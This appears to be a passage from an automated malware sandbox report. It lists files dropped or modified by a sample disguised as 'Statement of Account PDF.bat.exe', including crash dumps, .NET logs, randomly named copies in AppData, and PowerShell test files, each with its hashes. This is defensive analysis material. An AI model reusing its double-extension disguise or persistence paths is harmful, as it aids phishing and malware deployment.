                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.3.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2351.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4721
                                                      Entropy (8bit):4.456323326510158
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs1Jg77aI9t6WpW8VYqYm8M4JjegS2yFvVP+q8v5gS280NNPiSfSXd:uIjfPI7L77VqJjepPK5a/KSfSXd
                                                      MD5:375DB68D7B1CC703F2F0502DF0142728
                                                      SHA1:EDDA5F9F7F21E22EAC086EAEEF8D2B7AEE12AD5B
                                                      SHA-256:07314E2787F612BE31A782C1EB97D36D887B7EA101FE71B344B9F19E14642D8A
                                                      SHA-512:3FD5D502F8B9EC0C2DFF70FB9C832CDC6F2A2B382B8A0822DEE6925DA2AD7B5D0FD1308C0891C3B901FC61D36C66CFB557D72DEDB90222D9930871E666871FEB
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296615" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4195.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:21 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):241565
                                                      Entropy (8bit):4.52679090454485
                                                      Encrypted:false
                                                      SSDEEP:1536:JYaDO7KNuBojRwpN4uE2aOFdE7BLTgOoprZy59SVXNekxAcNtWdWCD4VBtT/LvLN:Jrm4uEq/EFLTgPrQzy9dA4dvjfvQQTj
                                                      MD5:7740E6B901C4694A63A280BB49964454
                                                      SHA1:B75D32A1A908290432BE7AEA7CDA778B3D93C880
                                                      SHA-256:4B286F48A92715C79E5D8A0B9B516E2B392E78C291A9C1D4ABA8C4D8EF02CC74
                                                      SHA-512:E4457D2574271EBA3092867B0F2DFE8CE793D1AB5B36143FACDA6D7F05D3FE8F96B0F85D36229DE3F9D820F9EE2966D21CFC8A543D02F72196DC1AB4CFC48F7A
                                                      Malicious:false
                                                      Preview:MDMP..a..... ........f+f............d............#..x.......$....*......D&..8@..........`.......8...........T............D...j...........*...........,..............................................................................eJ......(-......GenuineIntel............T............f+f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4281.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8400
                                                      Entropy (8bit):3.683470550398823
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJdn6qle6Y9vSU9N3MgmfZivprg89b9WsfScfm:R6lXJN6qle6YFSU9N3MgmfYP91fSZ
                                                      MD5:283742E8C860E5EFFCB9D7DCAF60B47C
                                                      SHA1:9BE7D371B03F81BAB383622933A865EBD30D84A4
                                                      SHA-256:4025B984AC9D176678D53D1BED21BDA6970D02BAC5D075E8EBD9561538586FA3
                                                      SHA-512:CC795158676A45E01858AA8B350F1E096C4961E64BBEF5E587E20578AAE786EC5E698D4A3E6911B481A93AE2125B92F19BC41BF036575EBAFBDFA33D390D5B05
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.0.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER42A1.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4721
                                                      Entropy (8bit):4.45504601655123
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zskJg77aI9t6WpW8VYtvYm8M4JjegS2yFTY6E5j+q8v5gS2cSNNPiSfSS:uIjfiI7L77V9JjeI6E5jK5PS/KSfSsd
                                                      MD5:7E9EEAED225228C9F2553FC90A5B00AD
                                                      SHA1:E8F8B332BAE0433E06FB210265B5F9F1F0C2E226
                                                      SHA-256:4AA5DC1EC1881B4D446BE3C5BEFBF90491FA52DDF205F8403512136743B2CF0C
                                                      SHA-512:9D6D3962118EE9EDEB0BB252F1F953D7B438F21F3D5E1BADA918272BCFB0AAF05ECCB793B55763ADCDD64BA3B99B3601EB9FF8516DD549C2DBFBB3672625E4EF
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6386
                                                      Entropy (8bit):3.6994495792577573
                                                      Encrypted:false
                                                      SSDEEP:96:RSIU6o7wVetb1r61YZ+Vn7EgaM4Un89byFsf22HGm:R6l7wVeJ1r61YZ+vprn89byFsfvmm
                                                      MD5:8CDC796D862160F853DF372A1F31B94B
                                                      SHA1:908D9D031B799570ED8605E8EA69BC92E5283A34
                                                      SHA-256:A2854D3EFB5B7A24B3CC59BC1BFE207070808B11F13CC82D5580C43F616EB37B
                                                      SHA-512:77BE2F2AE2AC71CF9DD7E5706EB4B755466D09D809196F421A53855F84BADC7BF3B9B2E98383801DE8A42C6FEC65ED72A8C40AC5631A11429947DC5FB148D5D7
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDF5.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:04 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):242961
                                                      Entropy (8bit):4.5052908898061155
                                                      Encrypted:false
                                                      SSDEEP:3072:nLLU4uEqoEoLTgHsbQpyAwiLesovQ436DKR:nLLU4zLTgMbQpyrvvD32K
                                                      MD5:0E31274DABC416C3C4FC90269CEFBE2C
                                                      SHA1:B7C41643B2DE9CBD55C6B9C460ADF6D1658F682E
                                                      SHA-256:5EDD73084ED5A40639CAE3E1376E9C225BAC2F7DF9CE55B80F6D3401CF368F0E
                                                      SHA-512:B291E9088F833DE41D61CE1B9E478FB3CFA715EF943FCF77E99C25D036E86A52C27454F41CA761B88824E01F590798FC6F46BAADC043EA1E211830AE04D0004C
                                                      Malicious:false
                                                      Preview:MDMP..a..... ........f+f............d............#..x.......<...X+.......%..zA..........`.......8...........T...........`F...n...........+...........-..............................................................................eJ..............GenuineIntel............T............f+f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BjTxJte.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Statement of Account PDF.bat.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gDdsxauPhk.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.380192968514367
                                                      Encrypted:false
                                                      SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:+LHyIFKL3IZ2KRH9Ougos
                                                      MD5:DFB938AC479D63575631BF9D1D7CEC60
                                                      SHA1:F42EBC6B0B4823B8600DC05237BDBCBA940C3CF1
                                                      SHA-256:38298BB292A779EA5009599691C03E780306D6E52CDA6A26AFA339F31FB2870D
                                                      SHA-512:F58116AE16C58A04775F0EB7992F7187805FA279461781311E018379C5AC383B75B72AE768CAB888919125D6EBFB83FAAD8811CE72867852A90832F82A79C7DE
                                                      Malicious:false
                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22v4wkjd.x43.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw4kxm1v.dz4.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvzfr0w2.3zk.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gof1kgrj.hnd.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpi3oywo.nkt.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv0x0w2p.gdl.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_netipabd.v3k.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqliqtw1.olg.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
